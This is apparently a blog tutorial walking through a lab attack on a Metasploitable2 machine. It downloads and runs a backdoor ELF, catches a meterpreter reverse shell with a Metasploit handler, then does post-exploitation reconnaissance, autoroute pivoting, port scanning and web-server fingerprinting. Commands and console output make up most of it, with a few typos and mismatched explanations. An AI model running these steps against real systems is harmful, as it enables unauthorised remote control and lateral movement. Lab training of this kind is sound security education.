--2021-07-10 00:47:02--  http://127.0.0.1/backdoor.elf
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
Saving to: ‘backdoor.elf’

backdoor.elf                      100%[===========================================================>]     207  --.-KB/s    in 0s      

2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]




    We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST as our local IP address. We can now run the module using the exploit command and wait for the incoming connections.



    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
 Consider running 'msfupdate' to update to the latest version.
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 192.168.43.152
LHOST => 192.168.43.152
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444 
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler...

    When we download the file onto the target, we provide appropriate permissions to the file via the chmod command, as shown in the following screenshot:



    chmod 777 backdoor.elf




ls -la
total 129
drwxr-xr-x  21 root root  4096 Jul  9 16:18 .
drwxr-xr-x  21 root root  4096 Jul  9 16:18 ..
-rwxrwxrwx   1 root root   207 Jul  9 16:17 backdoor.elf
drwxr-xr-x   2 root root  4096 May 13  2012 bin
drwxr-xr-x   4 root root  1024 May 13  2012 boot
lrwxrwxrwx   1 root root    11 Apr 28  2010 cdrom -> media/cdrom
drwxr-xr-x  14 root root 13500 Jul  9 15:53 dev
drwxr-xr-x  94 root root  4096 Jul  9 16:19 etc
drwxr-xr-x   7 root root  4096 Jun  2 05:32 home
....


./backdoor.elf


    Providing the 777 permission will grant all the relevant read, write, and execute permissions on the file. Execute the file, and now switch to the other terminal, which is running our exploit handler:



    msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444 
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] exploit: Interrupted
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 192.168.43.152:4444 
[*] Sending stage (984904 bytes) to 192.168.43.120
[*] Meterpreter session 1 opened (192.168.43.152:4444 -> 192.168.43.120:60290) at 2021-07-10 02:49:15 +0530

meterpreter >



    Mumma, we got it, we got the meterpreter shell acces to the target. Lets find some interesting information using the post exploitation modules:




    meterpreter > sysinfo
Computer     : metasploitable.localdomain
OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)
Architecture : i686
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
meterpreter > ifconfig



    Running the sysinfo command, we can see that the target is metasploitable (an intentionally vulnerable operating system), its architecture is i686, and the kernel version is 2.6.24-16.



    meterpreter > 
meterpreter > ifconfig

Interface  1
============
Name         : lo
Hardware MAC : 00:00:00:00:00:00
MTU          : 16436
Flags        : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::


Interface  2
============
Name         : eth0
Hardware MAC : 08:00:27:67:67:30
MTU          : 1500
Flags        : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.43.120
IPv4 Netmask : 255.255.255.0
IPv6 Address : 2409:4064:228d:76cd:a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::
IPv6 Address : fe80::a00:27ff:fe67:6730
IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter >



    Running the ifconfig command on the target, we see pretty interesting information, such as an additional network interface, which may lead us to the internal network on which the internal systems may reside. We run the arp command on the target and check if there are some systems already connected or were connected to the exploited system from the internal network, as shown in the following screenshot:



    meterpreter > arp

ARP cache
=========

    IP address      MAC address        Interface
    ----------      -----------        ---------
    192.168.43.152  fc:01:7c:29:00:77

meterpreter >

    We can clearly see an additional system with IP address 192.168.43.120 on the internal network. Approaching the internal network, we need to set up pivoting on the exploited machine using the autoroute command.



    meterpreter > run autoroute -p

[*] No routes have been added yet 
meterpreter > 



meterpreter > run autorotate -s 192.168.43.120 255.255.255.0

[*] Adding a route to 192.168.43.120/255.255.255.0...
[+] Added route to 192.168.43.120/255.255.255.0 via 192.168.43.120 
[*] Use the -p option to list all active routes

meterpreter > run autorotate -p

Active Routing Table
====================

   Subnet            Netmask         Gateway
   ------            -------         -------
   192.168.43.120    255.255.255.0   Session 1 

meterpreter >


    The autoroute -p command prints all the routing information on a session. We can see we do not have any routes by default. Let us add a route to the target internal network using the autoroute -s 192.168.43.120 255.255.255.0 command. Issuing this command, we can see that the route got successfully added to the routing table, and now all the communication from Metasploit will pass through our meterpreter session to the internal network.

    Let us now put the meterpreter session in the background by using the background command as follows:



    meterpreter > background 
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > hosts

Hosts
=====

address          mac                 name      os_name      os_flavor     os_sp     purpose     info
comments 
-------          ---                 ----      ------        -----       ----       -----      ----
 ------
192.168.43.120   fc:01:7c:29:00:77   metasploitable  Linux                          Server
 


msf6 exploit(multi/handler) >




    Since the internal network is now approachable, let us perform a port scan on the 192.168.43.120 system using the auxiliary/scanner/portscan/tcp auxiliary module as follows:



    msf6 exploit(multi/handler) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CONCURRENCY  10               yes       The number of concurrent ports to check per host
   DELAY        0                yes       The delay between connections, per thread, in milliseconds
   JITTER       0                yes       The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds.
   PORTS        1-10000          yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   THREADS      1                yes       The number of concurrent threads (max one per host)
   TIMEOUT      1000             yes       The socket connect timeout in milliseconds

msf6 auxiliary(scanner/portscan/tcp) > 
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.0
RHOSTS => 192.168.43.0
msf6 auxiliary(scanner/portscan/tcp) > run

[*] 192.168.43.0:         - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) > 
msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > setg RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/portscan/tcp) > run

[+] 192.168.43.120:       - 192.168.43.120:22 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:23 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:25 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:21 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:53 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:80 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:111 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:139 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:445 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:514 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:513 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:512 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:1099 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:1524 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:2049 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:2121 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:3306 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:3632 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:5432 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:5900 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6000 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6200 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6667 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:6697 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:8009 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:8180 - TCP OPEN
[+] 192.168.43.120:       - 192.168.43.120:8787 - TCP OPEN
[*] 192.168.43.120:       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/portscan/tcp) >


    Running the port scan module will require us to set the RHOSTS option to the target's IP address using setg RHOSTS 192.168.43.120. The setg option will globally set RHOSTS value to 192.168.43.120 and thus eliminates the need to retype the set RHOSTS command again and again.

    In order to run this module, we need to issue the run command. We can see from the output that there are multiple services running on the 192.168.43.120 system. Additionally, we can see that port 80 is open. Let us try fingerprinting the service running on port 80 using another auxiliary module, auxiliary/scanner/http/http_version, as follows:



    msf6 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/http/http_version
msf6 auxiliary(scanner/http/http_version) > show options

Module options (auxiliary/scanner/http/http_version):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.43.120   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    80               yes       The target port (TCP)
   SSL      false            no        Negotiate SSL/TLS for outgoing connections
   THREADS  1                yes       The number of concurrent threads (max one per host)
   VHOST                     no        HTTP server virtual host

msf6 auxiliary(scanner/http/http_version) > set RHOSTS 192.168.43.120
RHOSTS => 192.168.43.120
msf6 auxiliary(scanner/http/http_version) > run

[+] 192.168.43.120:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/http_version) >


    Running the auxiliary module, we find that the service running on port 80 is the popular Apache 2.2.8 web server. Exploring the web, we find that the PHP version 5.2.4 is vulnerable and can allow an attacker to gain access over the target system.


    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal



    • 0 comments:

    Post a Comment

    For Any Tech Updates, Hacking News, Internet, Computer, Technology and related to IT Field Articles Follow Our Blog.